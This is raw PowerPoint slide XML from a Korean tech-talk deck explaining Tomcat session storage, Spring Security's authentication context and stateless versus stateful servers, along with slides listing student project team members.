            <a:off x="5883442" y="2695074"/>
            <a:ext cx="0" cy="1118937"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="3B3B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6B5DAD0-CF4E-DB22-6D60-46B439E20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5355"/>
            <a:ext cx="12192000" cy="17126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E65DAC-6F8D-DA33-34A8-CB0FF36DE985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="62865" y="4545330"/>
            <a:ext cx="462915" cy="140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0E1508-335F-28DF-3ACF-3402A32C0A44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="62865" y="4994910"/>
            <a:ext cx="462915" cy="140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4E858A-B482-6069-C361-BF1B7DE7FE5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4821656" y="2929791"/>
            <a:ext cx="2123572" cy="378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후</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6970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5450A-8866-B112-C007-43F8340B9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HttpSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 구현체</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>StandardSession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A236DF-8F2A-2BE8-0ACA-342DEDAA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2851049"/>
            <a:ext cx="10421804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3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04594-750C-6DDA-1A01-A763CC632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HttpSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 구현체</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>StandardSession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D9971B-9384-8F52-0F04-6B05C741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48" y="764305"/>
            <a:ext cx="7417304" cy="60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3BD2F-22C5-214F-6051-B5AABB15B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 소스 코드를 통해 알 수 있는 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FF622-CF58-1625-24BF-B46C3A106A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="283349" y="916973"/>
            <a:ext cx="8829661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Spring Boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 내장된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>은 세션에 정보를 해시 맵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>해시 테이블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en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>으로 관리함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Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타입으로 되어 있어 세션 내에 객체를 저장할 수 있음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33981-7363-B7B4-DB43-6E88D460E857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574806" y="1881822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HttpSession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session =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req.getSession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Long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memberId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= 5L;</a:t>
            </a:r>
          </a:p>
          <a:p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session.setAttribute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memberId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memberId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Long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myId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= (Long)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session.getAttribute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memberId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");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BEF9A-8B64-C86E-C7B2-7CFBF265B169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="283349" y="3435298"/>
            <a:ext cx="9421169" cy="17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Spring Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에서는 세션 내에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>SecurityContextHolder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 객체로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>만의 공간을 확보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Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>객체 내에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>UserDetails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타입의 객체가 존재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사용자가 로그인하지 않은 상태이면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>객체는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>anonymous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>상태를 가지며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사용자가 로그인 시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>객체 내에 사용자 정보</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(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*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이 저장됨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5D66F-4BD9-4036-9D98-D128AF47B081}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6451815" y="6309526"/>
            <a:ext cx="568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ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>비밀번호는 데이터베이스에 암호화돼 저장된 문자열이 자바 객체의 필드에 그대로 저장됨</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>개인정보보호법에 따라 데이터베이스에는 비밀번호를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>평문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> 저장 불가하며 암호화해야 함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771101-E37F-400A-0218-29D40CB1A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782" y="1726095"/>
            <a:ext cx="4322813" cy="17755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2631C9-4B25-3F15-507C-894646A2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743" y="5193254"/>
            <a:ext cx="6310563" cy="6962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FC77B4-37A6-E188-95CE-380C548AE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86736" y="5930106"/>
            <a:ext cx="12192000" cy="2766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211FA2-8D6D-0B68-5D07-8DF0B3923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942" y="5941027"/>
            <a:ext cx="7364635" cy="2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3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6FC1F-5000-1C7E-2D4A-48B143BA0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HttpServletRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 구현체</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, Request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C7B926-1489-2237-B644-4EE3BD5A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278" y="794153"/>
            <a:ext cx="6771563" cy="608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3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49C31-31DE-BF98-2D6F-6F505C205B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Manager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 구현체</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ManagerBase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BA3475-4402-DC60-50CB-179ABBC3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04" y="1335146"/>
            <a:ext cx="8354591" cy="2295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E06008-75FF-4964-CAF7-802A62A22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490" y="4713116"/>
            <a:ext cx="9412013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5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E7A8277C-70AA-9626-7CD5-0096BC98D30F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7727728" y="1277076"/>
            <a:ext cx="2520000" cy="252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D54A771-D25B-4714-A072-BE95350CE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박연종</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>프로젝트의 일원이 되다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4556E9-6235-64F3-A6D2-1A80F8C911C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1395320" y="5580924"/>
            <a:ext cx="2731109" cy="751508"/>
            <a:chOff x="5003505" y="2112439"/>
            <a:chExt cx="3593607" cy="10598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23CEEE8-3F7E-BAA4-B1F4-551B4E3D0BF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5003505" y="2112439"/>
              <a:ext cx="3593607" cy="10598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1BB401-5255-C8EF-43BE-1C6E69A07923}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5006574" y="2112439"/>
              <a:ext cx="2720617" cy="701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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>프론트엔드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정성윤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황용진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이민우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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>백엔드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>      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채주혁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권오빈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박연종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3DD9A1-B227-3BAC-BE7E-69A4E5D2B2A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7013402" y="5195451"/>
            <a:ext cx="3948652" cy="1522453"/>
            <a:chOff x="291689" y="4481486"/>
            <a:chExt cx="4040675" cy="15224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68EA4B-3008-D3FB-7BC2-50C5B7ACE438}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="291689" y="4481486"/>
              <a:ext cx="4040675" cy="15224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01A678-9011-38C5-3E13-492AC1DC1AAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="373269" y="4539626"/>
              <a:ext cx="3853940" cy="1347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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>프론트엔드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오세찬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황용진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김정훈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bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>백엔드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>      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</a:rPr>
                <a:t>김건우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김시완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강민기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</a:rPr>
                <a:t>디자인      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</a:rPr>
                <a:t>황준호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조남솔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</a:rPr>
                <a:t>정예경 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill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</a:rPr>
                <a:t>산업공학과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</a:rPr>
                <a:t>기획          </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>: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박효준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권오빈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박연종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허광민</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="140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손유나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801300-4C45-649F-BA98-5685CE0468F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1456733" y="1277076"/>
            <a:ext cx="2520000" cy="2520000"/>
            <a:chOff x="2768424" y="1630224"/>
            <a:chExt cx="2520000" cy="252000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F16426F-A60E-0913-D80C-19D28F858E10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2768424" y="1630224"/>
              <a:ext cx="2520000" cy="25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A131F07-0014-4C9A-3D2F-1658A02B5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5811" y="2594823"/>
              <a:ext cx="2385225" cy="59080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2FEA20-5AF6-E8DB-FAC3-A34DD256FA47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673521" y="3971471"/>
            <a:ext cx="4086422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/>
              <a:t>차세대 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0" err="1"/>
              <a:t>컴퓨터네트워킹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0"/>
              <a:t> 연구실과 함께</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" spc="-150" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0"/>
              <a:t>하는</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" spc="-150" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0"/>
              <a:t>외국인 일자리 플랫폼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826373-8AC7-DFC3-8707-48D5353ABBD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6305166" y="3949253"/>
            <a:ext cx="5341549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 err="1"/>
              <a:t>국립금오공과대학교의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0" err="1"/>
              <a:t>테코톡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" spc="-150" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0" err="1"/>
              <a:t>야밤의금오톡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" spc="-150" dirty="0"/>
              <a:t> 발표자 신청</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" spc="-15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pc="-150" dirty="0"/>
              <a:t>프로젝트 및 스터디 모집 플랫폼 개발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13B909-062F-8C15-9822-8A0B27547AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8216988" y="3880440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우아한테크코스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663075-A37C-2C0E-F6F1-3EE78E64E852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="779737"/>
            <a:ext cx="12192000" cy="60782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4D5AF2-A788-00F9-6CD2-166F634F8676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570246" y="2963917"/>
            <a:ext cx="2978676" cy="536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234F180-FB32-6051-9A33-CC1E0CB41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57" y="1856570"/>
            <a:ext cx="4683298" cy="39245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F1966A-5113-FE24-D79E-466ED2AC0A96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331856" y="3136612"/>
            <a:ext cx="4807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그리고 아무도 답이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>없었따</a:t>
            </a:r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…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62B36-35D9-141A-BAED-A299D90D1A3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20782874">
            <a:off x="9158625" y="3882361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그래서 안 한 것인가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!?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705F7B-CF5E-3EBB-09DE-E50DE164DE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570246" y="3346027"/>
            <a:ext cx="3013963" cy="534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79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6671B0-25D8-3467-B76A-07D71F64F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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 지향한다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FA1F6-8DF3-F789-80B4-0BCDFC3B0A40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="110160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Stateless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0465E-C7DB-3DBC-8A07-FCAB2636F22C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742400" y="1101600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서버가 클라이언트의 정보를 저장하지 않음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89753-63B6-9B0E-9F45-E706DB1E77F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="164982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일상 생활에서 비유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1C16A9-B0FE-75F7-5C4B-8C4D73EED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1689" y="2433167"/>
            <a:ext cx="989911" cy="116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6BF340-A81E-AF7E-0B19-00297FD2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32" y="2433167"/>
            <a:ext cx="833057" cy="124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351844-6567-8B85-538A-D46E8F92C690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094400" y="2646929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노트북 모델 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 가격은 얼마인가요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0DA42-2793-737A-2654-CA517E27B8F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3773656" y="322584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100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>만 원입니다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A3CAD80-DC16-8D19-0446-D5B43D1E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1689" y="3890605"/>
            <a:ext cx="989911" cy="116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E57BB76-93CE-7F93-613D-D54C208D8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32" y="3890605"/>
            <a:ext cx="833057" cy="124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5087BF-1F42-33EA-6175-B68244E36594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094400" y="4104367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개 구매하겠습니다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DB303-6238-F8E1-DE86-7E9B5DED3D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082214" y="4522506"/>
            <a:ext cx="433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총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>만 원입니다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현금으로 결제하시나요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>카드로 결제하시나요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6DA5876-F1E6-BDA1-D16F-EDCFC9A6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1689" y="5352221"/>
            <a:ext cx="989911" cy="116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8F4C10FF-C523-69DB-5B31-DDE8E4CC7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32" y="5352221"/>
            <a:ext cx="833057" cy="124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DE08CB-1B1B-23E7-17D3-9E651B2ACF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094400" y="5565983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카드로 결제하겠습니다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F0A02-0EBB-68B4-EA1B-1EE321BEC0F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3773656" y="614490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결제되었습니다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F37F93-7262-997F-DCEB-DD76A42AEA55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="200123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Stateful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2F4C995-26BD-2E13-A0B3-702EDEC7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2451080"/>
            <a:ext cx="989911" cy="116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D6A1883-44CC-6133-C1E0-85F41790B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43" y="2451080"/>
            <a:ext cx="833057" cy="124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F37190-30E1-D356-8E17-22B1FD78BF23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6898711" y="2664842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노트북 모델 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 가격은 얼마인가요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C6EDEE-5E90-CA68-43AC-40FDDAF842EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9577967" y="3243759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만 원입니다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66487B5-E9C0-CC9D-ACAC-56AE8B94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3908518"/>
            <a:ext cx="989911" cy="116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6609ABAD-068B-873C-D75F-DD578C999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43" y="3908518"/>
            <a:ext cx="833057" cy="124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B6B5A9-4F24-983C-9D0A-D81C57A500DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6898711" y="412228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Z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개 구매하겠습니다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4BECD9-83D8-8E86-48D4-2A99ACDBE961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6886525" y="4540419"/>
            <a:ext cx="433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총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>만 원입니다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현금으로 결제하시나요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>카드로 결제하시나요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84EDA13-E927-140B-D93F-F4E6D2EC4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5370134"/>
            <a:ext cx="989911" cy="116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5CBDB99F-1338-7A40-9F93-42A29F69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43" y="5370134"/>
            <a:ext cx="833057" cy="124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361812-B39B-2E52-6BAB-06A7397A6343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6898711" y="5583896"/>
            <a:ext cx="35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Z 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개를 카드로 결제하겠습니다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9BBEF0-E986-627C-DE76-9ED2032F4CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9579571" y="614490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결제되었습니다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D367E8-80B0-E6F3-7434-2017303A391A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="201915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Stateless</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="36" name="직사각형 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A36DA4-2619-0322-DA06-01199334DAAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6120616" y="2001734"/>
            <a:ext cx="5828927" cy="46167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35" name="직사각형 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B44AD79-C45A-FB9C-3C7C-78DB6D79CE2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="2001239"/>
            <a:ext cx="5828927" cy="46167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35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  <p:bldP spid="3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hlinkClick r:id="rId2"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
